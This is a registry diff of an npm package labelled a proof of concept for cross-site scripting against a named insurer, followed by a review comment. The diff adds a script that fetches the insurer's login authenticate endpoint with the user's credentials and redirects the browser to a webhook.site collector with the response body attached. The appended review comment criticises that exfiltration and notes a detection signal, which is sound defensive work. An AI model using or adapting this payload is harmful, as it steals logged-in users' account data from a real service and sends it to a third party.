poc-malakoffhumanis-xss2 1.0.0 → 1.0.2

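--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
  {
  "name": "poc-malakoffhumanis-xss2",
- "version": "1.0.0",
+ "version": "1.0.2",
  "description": "",
  "main": "index.js",
  "scripts": {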
@@ -1 +1,7 @@
1
- alert()
1
+ const leak_url = "https://webhook.site/39bb8c4f-43f5-478e-ad53-e4547ad0fe5a"
2
+
3
+ fetch("https://connexion.malakoffhumanis.com/particuliers/login/api/authenticate", {
4
+ credentials: "include"
5
+ }).then(d => d.text()).then(d => {
6
+ location.href = `${leak_url}?data=${encodeURIComponent(d)}`
7
+ })
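Review bot: The added script moves the full body of a credentialed response off-origin: the `fetch` is made with `credentials: "include"`, and the last `.then` assigns `location.href` with the response text in the `data` query parameter, so whatever the authenticate endpoint returns for the logged-in user ends up in a third-party collector's logs and in browser history. For a proof of concept published to a public registry that is more than the demonstration needs; reporting only non-sensitive evidence, for example `.then(r => console.log(r.status))`, shows the script ran in the user's session without exporting account data. The file also has no header comment stating the test scope or that the hard-coded collector URL is a throwaway, which would help anyone triaging the package. On the defensive side, outbound navigations to `webhook.site` carrying a long `data` parameter are a usable detection signal. The file header for this section is not visible on the page, so the path (presumably the package's `index.js`, per `main`) is inferred.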